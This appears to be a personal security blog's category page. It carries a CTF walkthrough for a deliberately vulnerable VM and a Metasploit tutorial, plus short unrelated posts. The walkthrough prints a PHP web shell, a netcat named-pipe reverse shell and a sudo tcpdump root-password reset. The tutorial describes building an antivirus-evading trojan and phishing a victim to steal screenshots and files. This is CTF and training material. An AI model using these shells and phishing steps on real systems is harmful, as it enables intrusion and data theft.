| MENU |

Posts Categorized / Computers

Computers, Hacking

ICA Indonesia(Bali 2015) CTF Walk-trough

Hello People,
Its been a while I’ve updated my blog, this blog write up is for the recent ICA Event ( Indonesian Cyber Army ) that held on 1st and 2nd October 2015 in Bali, Indonesia.
I got to admit something, Bali is so Good…. nice people, nice food, nice beach , nice clubs and many more nice things…..
I miss Bali….  🙂

This is a walk-through for CTF Competition. Let dig in:

Firstly you need to understand the Design of the CTF, as per the picture below:
ctf_hacking

As you can see the diagram, each team have 3 members, and there is Pitboss System named Master and a Live telecast on the projector showing the results.
Each team have to run a specially designed Virtual Image called “THOST”  a.k.a Target Host , this Target Host is a Customized RHEL 6.4 with some vulnerability, On the day of the event,
each team been given a copy of THOST.

To run the THOST, there is some requirement:
1) THOST is a VMware Workstation Image, therefore, you required to have Vmware Workstation.
2) THOST require a Password to start and a CODE to configure.
3) THOST required active Network connection to Master System.
4) THOST is not available for Download, its been given to each team participated in ICA CTF Bali 2015.

Some of the participants asked me to give them the master system, I’m truly sorry, I can’t do that, and actually, you don’t really need the master system to run for practice.

To Perform a self practice, firstly, make sure you meet the requirements:
1) An x86_64 class Laptop/Desktop. ( Macbook also accepted  )
2) Windows 7 or Windows 8 64bit. ( OSX Mavericks and Above )
3) Install latest VMWare Workstation  ( Vmware Fusion for Mac )
4) Minimum 4GB RAM.
5) Enough space for 2 VM [ Kali Linux and THOST ( less then 5GB)  ]

Then, Configure your 1st Image :
1) Create KALI Linux ( 2.0 ) Image in Vmware
2) Setup the Networking for Kali as Bridged in Vmware
3) Set IP address as 192.168.0.250/23 [ 255.255.254.0 ]
*** you came for a hacking competition, therefore, you should know how to setup Kali Linux.
*** if you don’t, you don’t deserve to be here ( seriously )

Kali-Network-setup

Next, Configure THOST :
1) Copy the THOST image from the DVD to your system
2) Start the THOST Image from VMware Application
3) The password to start the image is  “ica2015”

Steps to configure the THOST:
1) Once the THOST is started, you will be presented with Enter ICA Code
Thost-CODE
[Enter your assigned ICA Code ]
** The ICA code will set the IP address in the THOST.
** therefore, if your ICA Code is A22 , then your IP address would be 192.168.0.22/23(255.255.254.0)
** The A followed by a number is the code, the number represents your IP address for the THOST
** Make sure the NIC for THOST image is bridged, THOST will fail to start if it cannot ping 192.168.0.250 (Kali)

2) After the code is entered, you will get this output, there will be 7 flag created in this THOST, this flags are unique for each TEAM
Thost-Flag
[ 7 flag file and Random Admin Password for login ]

3) Then, immediately, you will get a prompt to restart,
Thost-Flag-restart
[ Press K to restart the THOST system ]

4) Once the THOST restarts, it will prompt you to continue,
Thost-Flag-restart-Continue
[ Enter C to continue boot ]

5) The THOST will self configure the IP address and Prepare all the vulnerability and will perform connection to IP 192.168.0.250/23
***it very critical for IP 192.168.0.250/23 to be in the network. ( in practice, the KALI Linux image has the IP 192.168.0.250 )
Once the configuration is done, you will get this out put.
Thost-Flag-restart-login
[ Write down the Admin user name and password somewhere, as this is the only login allowed to login to THOST, press K to login ]

6)Login to the THOST with the username admin and the password it gave you.
*** root user account password is 16 char, randomly generated, therefore, even me have no idea, what is the root password.
*** Once you login, verify the IP address and make sure you can ping 192.168.0.250 and from Kali Linux, make sure you can Ping the THOST.
Thost-login-verify
[ verify IP address and ping Kali Linux ]

For the rest of the walk through, we will assume
KALI LINUX IP = 192.168.0.250/23
THOST IP = 192.168.0.22/23 {ICA Code : A22}

—end of THOST config —-

If you manage to come up to this level, you are good to go to next level.
Next, we will dive into the Flags.

The main Objective of this ICA CTF is to capture the flags inside the THOST and upload to the flag server; |
the more flags you capture from more enemy, you will earn more points.
Since this is a practice, you are not required to upload the flag to flag server.
You just need to know how this flags can be captured.

Lets walk-through, The topics :

A) The scanning and ports open.
B) Vulnerability 1 [ user1 , user2 & user3 ]
C) Vulnerability 2 [ user cadlock and apache ]
D) Vulnerability 3 [user root escalation using sudo ]
E) Exploit to escalate to root [ upload exploit to root the system ]

A) The scanning and ports open

From your kali linux, you should perform a nmap to scan and see what are the Interesting Ports open
a nmap result would be like this:
nmap-scaning
[ nmap scan result ]

The result is very obvious , that very interesting TCP ports are open,
port  21 , 22 , 80 , 111  and 5666 is open.
As you should already know that port 21 is a FTP port, and 22 is ssh and 80 is Web,
so, as a hacker, you need to see what is interesting in this services.
recommended, you login to each services and perform a full reckon on what is available in each service.

B) Vulnerability 1

The first vulnerability is the FTP server, inside the FTP server, there is 20 files that been encoded, the clue is in the README file.
all you have to do is, download all the files from the FTP Server and decode and decrypt the files to reveal passwords and login information.
ftp_readme
[ a simple ftp to THOST will reveal the README file and the clue is there ]

Next, use ftp command to download all the files into your Kali Linux
ftp_download
[ login as anonymous and download all .txt files ]

To decode the files, run
decode-txt
[
 use md5sum to see which files are different, then run base64 -d ]

Once you get user1 password, you can login to THOST as user1 and capture the flag1 , as a hacker, you should see what else is open for access as user1 , if you look carefully, the directory
/home/apache have read access for others, therefore a bonus flag can be captured in /home/apache
flag1-flag6
[ ssh to THOST as user1 and get the flag1 and flag6 of apache user ]

Following up is, access to THOST as user2 and user3, user2 and user3 password are in the same file as the user1, but it been encrypted with AES 256 CBC and the password for user2 file been revealed in user1 decoded file, all you have to do next is, run

user2-pass
[ this reveals user2 password and encryption password for user3 ]

Next do the same for file number 3 to reveal user3 password
user3-pass
[
 this reveals user3 password ]

Now you have user2 and user3 password to access the THOST
In summary, the README file resides in the FTP server, clearly states the status of all files…
1) all files are encoded  ( means: all files are encoded in base64 )
2) some files are encrypted and encoded ( means, there is 2 files encrypted with aes-256-cbc and then been encoded with base64 )
3) find the encoding and decode to reveal the clue
4) the clue will reveal the password to decrypt the enncrypted files
note**  all encryption standard are AES 256 CBC ( this means all encryption standard is AES-256-CBC, you should know that this standard will encrypt and encode with base64 )

So, the 2 files are double encoded.
Next, once you get the user2 and user3 password, you can login to THOST and get the flag2 and flag3.

The second vulnerability,

C) Vulnerability 2

Pretty much, with user1, user2 and user3, you already can get flag1 , flag2 , flag3, if you dig further, you can also get  flag5( cadlock )  and flag6 (apache ).
with user1, user2 and user3, you can access apache home directory and the web system directory , /var/www/html/ , the login.php is hard-coded with cadlock user password.
cadlock_web1   cadlock_web2  cadlock_web3
[ the 3 diagram shows, how you can get cadlock username and password to capture flag5 ]

Now, if you did not manage to get user1 , user2 or user3 passwords from the clue, there is 2nd vulnerability  in the web site running in THOST, the Cadlock Intranet Backup System.
You can get at least 2 flags from this method, flag5(cadlock)  and  flag6(apache).

The tools you should use is dirbuster to see what are the directory available in the website and attempt to bypass authentication to gain entry to that directory.
dir_buster1
[ Run dirbuster against the THOST website to reveal what are the directory available ]

dir_buster2
[ After scan, you will notice there is a directory called  logs and there is log_mon.php ]

Attempt to access http://<thost ip>/logs/log_mon.php
cad_lock_port_udp1000
[ this is the page for log_mon.php, you access without authentication ]

If you read carefully, a clue been given here, that is, port UDP 1000 is receiving data and its written directly to this page.
As a hacker, you should see the opportunity here, you can post arbitrary php code to port UDP 1000 using netcat and attempt to execute that page with your code, solution :

net_cat1    net_cat2

As you can see the POC of typing text in netcat port 1000, gets into the page directly.
using this method, you can run a netcat session in Kali Linux and get THOST to spawn a shell for you. Solution :

Steps :
net_cat3 net_cat4 net_cat5  net_cat7  net_cat8  net_cat9 net_cat10 net_cat11

In summary : all you have to do is:

1) Once in netcat : run ( netcat THOST-IP -p 1000 ) and run this to insert the PHP code to the log_mon.php page
<?php echo exec($_GET[“cmd”]); ?>

2) Start a local netcat in KALI linux
nc -lvvp 1234

3) run in address
http://THOST/logs/log_mon.php?cmd=mknod /var/tmp/backpipe1 p

4)run in address
http://THOST/logs/log_mon.php?cmd=/bin/sh 0</var/tmp/backpipe7 | nc KALI-IP 1234 1>/var/tmp/backpipe1

5)run in the local netcat session : to spawn a SHELL
python -c ‘import pty; pty.spawn(“/bin/sh”)’

and there will a shell access to THOST as user apache….  🙂
You can cat the login.php file in /var/www/html/ to reveal cadlock password.

Moving on.

D) Vulnerability 3
This one is a bit tricky, but as a hacker, you should always think, once you gain entry to a system, what else you can do or find…
In that context, the flaw 3, is under user cadlock, if you login to THOST as user cadlock, you can run sudo -l , it will reveal that user cadlock been granted access to run tcpdump using sudo,
it may look totally legitimate command to run by user cadlock, but, there is a flaw in tcpdump command in Linux, go through the diagrams to see what would happen when you run tcpdump using some smart flags…  🙂

 

tcp_1 tcp_2

The steps is very straight forward:

1) echo $’echo pass | passwd root –stdin’ > /var/tmp/.runme  ( will create a file in /var/tmp/ with the command to reset root password )
2) chmod +x /var/tmp/.runme ( make the file executable )
3) sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /var/tmp/.runme -Z root  ( read man tcpdump to get the meaning of all the flags )

***THOST system will prevent writing to /tmp , therefore, you can write to /var/tmp
*** running tcpdump with that options, will invoke the runme file, where it will reset root password to pass
*** and you can reset  root with password pass to gain flag7(root) and flag4(admin)

E) Exploit to escalate to root

Finally, exploit ….. this is hard, one should master the C coding, assembly language, debuggers , Assemble Machine Language analysis. I seriously never hope any team to do this, but congratulations to Team from University of Indonesia to attempt the exploit. But… it failed… 🙂

Well, let me give an introduction on the exploit.

Exploit is a program that performs insertion of shellcode to memory that has some kind of bug, in this case RHEL 6.4 have a perf_event bug that documented in cve-2013-2094 , semtex.c.
The exploit semtex.c will open root shell and escalate to root from regular user. The mitigation step is to prevent perf_event handler in Kernel to run as a regular user, the THOST system is enabled with this workaround. Therefore , running the exploit from public source will be prevented.

Steps to download and run :
semtex_1  semtex_2

As you can see, running semtex.c failed, because the THOST system have prevented the perf_event handler in Kernel, the flag kernel.perf_event_paranoid=2 will prevent semtex.c exploit to run. This is a work around published in the CVE-2013-2094
semtex_3

But, the internet is a BIG Ocean, instead of using a publicly available exploit, you should get in touch with some underground exploit. Where, the publicly available exploit would be heavily modified to bypass any work around.

As a proof of concept, you may view the picture below:

sem3_1
[ the file semv3.tgz have the modified version of semtex.c ]

sem3_2
[
 as you can see, the /etc/sysctl.conf still have kernel.perf_event_paranoid=2 enabled, but the modified version of semtex.c can escalate to root ]

*** to protect the original author of the modified version of semtex exploit, i cannot upload the semv3.tgz anywhere, but, if you work hard in the internet, you could find it from some site.

So… we are in the end, thank you for your interest in the CTF, hopefully, you understand the steps and all the vulnerability, this vulnerabilities are created by me, therefore, its not something you can find in the wild, its purely for ICA CTF Hacking event in Bali.

You may email me if you have any questions but under this condition:
1) I cannot give you the semv3.tgz file, don’t ask
2) I cannot teach you hacking, you have to teach yourself
3) There is no book, or referral for hacking, all they have is purely for education purposes.
4) I can be invited to do a Talk for your campus, if Accommodation and Travel expenses is covered ( Only for Indonesia ) 
5) I am NOT a hacker, I’m doing R&D for  FOResec ( Research and Development )

Thank You very Much. Until we meet again, “Good Hunting”
Special shout out for all the team members from STIKOM Bali to make this event a memorable for me.

you wanna be a h@ck3r? then learn coding, coding in C, else you are considered a script kiddie”  –  $73v^en

Computers, Hacking

Metasploit Framework – Hacking 101

Hello People,
Been long time, i never update anything, finally, a free day in my life…. I’ve compiled a hacking tutorial for beginners to learn and understand,  about Metasploit Framework and what and why and how to use it.
The scenario would be, using a Linux Kali system with Metasploit, we create a file and send to a Windows machine and make the user to execute it, and when the user execute the file, a connection would open to Linux Kali, beyond that, we can control, steal and pretty much do anything to Victim Computer.

The scenario calls for a situation where, a file that created is a kind of a “Trojan virus”, and we send the trojan to victim machine, the challenge is, to send the file and make the file bypass the default security settings in a Victim computer.

Firstly, Prepare your environments, things you need :

1. Virtual Machine [ one Kali Linux VM & one more Windows 8(Victim) VM ]
2. Knowledge [ TCP , IP , some basic command Line knowledge in Windows and Linux ]

The Topics :

A. What is Metasploit Framework  & How to Use it
B. What is Payload  and How to Create it
C. How to Transfer or get the payload delivered to Victim
D. Exploit! and the Fun Begins !!
E. Things you can do once Exploit is Successful

Lets begin, 

A. What is Metasploit Framework  & How to Use it?

Metasploit, is a Framework to perform penetration testing towards a Computer, the Framework contains all the latest known vulnerabilities in Software and Hardware that available in the Market, from Windows , Unix to Cisco Router … etc.., therefore, using the framework, One can exploit the known vulnerabilities of a System. Obviously, the usage of this framework is to learn and patch known holes in the systems.

How to use Metasploit? The Framework is downloadable and Configurable in any Linux / Unix environment, but, to make life easier, its already included in Linux Kali, you just need to start it to use it.

Start you Linux Kali and set the basic network settings, then Start the metasploit framework.
get-ip-in-kali run-msfconsole

 

Once the msfconsole is up and running, then we need to create the Payload!,

B. What is Payload  and How to Create it ?

A payload is term used in Metasploit Framework to describe a specially crafted file that contains malicious code that has ability to perform backdoor connection. Commonly, a reverse connection back to the hacker computer. Most Anti virus would detect this, but as technology evolves, only the best anti virus & anti malware has the ability to read the file’s pattern and detect it as a virus or malicious file that would harm the computer. 
Creating a Payload in Metasploit Framework is very easy,  there’s many payload available in this framework, for simplicity purpose, I’ve used the most easiest payload, lets see, on how to create it, 

Firstly, you need to run these commands, These commands will make the framework to load the particular payload
use-payload-reverse_tcp

Once the payload loaded onto the framework, we need to plumb in some information about our Linux Kali and then, we create the payload file. 
generate-Payload

C. How to Transfer or get the payload delivered to Victim? 

Once the payload file created, I’ve named it “runme.exe”, the next step is, we need to create a webserver and put the payload file in the web server, and send a trick/spam email to victim advising him to download and run the file. 
[ For the purpose of simplicity, I just created a simple FAKE website and simple FAKE email to do this, you can be creative, create a super FAKE page and a SUPER fake EMAIL to convince the victim, remember!, the success of this hacking is all about getting the victim  to download the file and execute it ] 
You can follow the steps below for a simple POC web server and a simple Fake email with links. You just need to copy the payload File called “runme.exe” to the web directory and create a index.html file with appropriate html syntax and start the Web Server. 
prepare-Webserver 

Once, the web server started, you can now, go ahead and browse the site via ip address and verify the payload file is downloadable, if its good, go ahead and create an email to the victim with links pointing to the Payload files and send to the victim. 

send-email-link

After the email is sent, the next step would be, to create a handler to handle the incoming connection from our payload file. 

D. Exploit! and the Fun Begins !!

Exploit! , well, based on the payload you use, you can hit directly to a victim computer or create handler exploit to handle incoming connection from the payload execution. In our case, we are not hitting directly, because, hitting directly is solely based on what software is running in Victim computer and the count of vulnerabilities exist in that software. What we about to do next is, to create a handler exploit, which, the framework would create a server process and start listening to connection from the payload file. A handler is to handle the incoming connection upon successful execution of the payload file in the victim computer, Once the Victim executes the payload files, the handler will send a staged file to the victim computer , and this is what we call “Exploit”  for that, the following commands would create a handler , and will start a server service. 

Start-Handler

Done! you may congratulate yourself! , The Payload created and sent to victim, and Handler exploit is running in our Linux Kali, next, we shall WAIT for the victim to execute the file. 

Since, we sent the payload via a link through email, and the victim’s computer is a Windows 8, the victim would see an email and links as follows,
login_screen  Win8ent  fake_email_with-link  Click_Run_the_Payload 

The last snap, is where the Victim downloads the file and executes the file, in a not well maintained Windows system, the file can be downloaded without any problem. 

When the victim, executes the file, nothing will happen, the victim would NOT sense anything, it would not disrupt anything the victim is doing, but in the background, what really happens is, the payload file ( runme.exe ) have created a connection back to our Linux Kali system, and our handler exploit ( Server Process ) will exploit the victim’s computer by sending a stage file to the victim computer, as you can see, a hole is created between the Linux Kali(attacker) and Windows 8(Victim) the following output is expected in Linux Kali system
Session-Started

and, we Own3d the Windows 8 (victim), during the sending of stage file, the victim could not sense anything, his/her computer would behave  normal and since we crafted the payload using “Shikata Ga Nai” encoder, even the built in anti malware in Windows 8 could not sense it,  the following step, is what can we do to the victim, there are many commands can be executed, many thing can be done, I’ve highlighted, 2 fun things you can do, 

E. Things you can do once Exploit is Successful

Lets say, the victim is browsing and logging into some website, or practically doing anything in his/her computer, we can snapshot the screen and save it in Linux Kali system, as follows, 

Victim is Broswing casually, Logging into some sensitive websites that reveals information for his/hers  eyes only, 
victim_broswing_casually

On the Linux Kali, in the framework, we can run this command and save the snapshot of the victim’s computer,
run_screenshot the_victim_screen 

That’s a cool thing to do! don’t you think so? [ Evil Laugh ] 

Apart of the screenshot, we could also steal the victim’s data! Let’s say, the victim have some data/files  in his/her computer, because we have a session connected via our payload, we have the ability to browse and download the files. 

Steal_1 Steal_2 

And that’s metasploit framework in action, simple and ready to use. As you can see, the entire demo in this blog is for learning and POC only, one can misuse the information doing  illegal activity, One can do this very creatively in any open Network, its not necessary to send the links via email,one can perform network poisoning to redirect the victim to download the file and one can create a webpage that auto downloads the payload file… or perform buffer overflow using known vulnerabilities in the victim computer,…..anything is possible….  so,  to save guard your system, follow this steps:

1. NEVER download files or Click any unknown links you find in internet, email or files. 
2. Encrypt your DATA at all time.
3. Update / Install Patch to your system 
4. Have a counter protective softwares such as Anti Virus, Firewall and Anti Malware 
5. Be vigilant and Attend training for more information on how to be safe in cyberspace. 

By Following the steps highlighted above, you can rest assure, your computing would be safe…. 

Thank You very much for reading and supporting my blog. Do let me know, if you need more information, if I’m free, I’m willing to help, or buy me beer, that would really encourage me to really HELP you…. hehehe….So long people, till’ we meet again in another blog post. Stay Safe, Stay Vigilant! 

*all this DEMO was done in a Controlled environment, no DOGS or CATS were harmed during  the production of this DEMO. 
*all EMAIL, COMPUTER AND WINDOWS account used in the DEMO is with 100% permission from the owner[s]. ( That is ME ) 
*Use all the information with your own risk, www.steven.com.my do not condone this demo to be used in real public environment or for any illegal activity. 

 

 

Computers

Learning PHP / CSS / HTML

Well, I’m a technical trainer, but never a programmer, actual fact is, I learned programming & my major was Programming, gone the days where I compile c programming in my head… well, to maintain that I still do shell programming…. via unix/Linux… interesting, but requires depth understanding of admin commands before you can shell script… now, I’m learning more & more about php/CSS/HTML… and every time is see the code snippets … I get a my head spinning at 10000 rpm… but… hey, it’s a good thing & nice to learn new things… for the beginners, I strongly encourage you guys to browse these links….. example, setting up php… and so on…

W3school

easy php

php net

… more to come… chillax

Computers

My Tech…

My Tech Systems…. its getting older… but, still performing…

 

 

Computers

Some of my training Pictures….

20140301-002350.jpg 20140301-002413.jpg

20140301-002426.jpg20140301-002509.jpg

Computers

Blog Entry 101

Entry attempt from iPad, works cool! upload picture of me training the PDRM force for better network security.

20140301-002106.jpg

Computers

Hello world!

My Very First Post on my Own Blog…. wink! wink!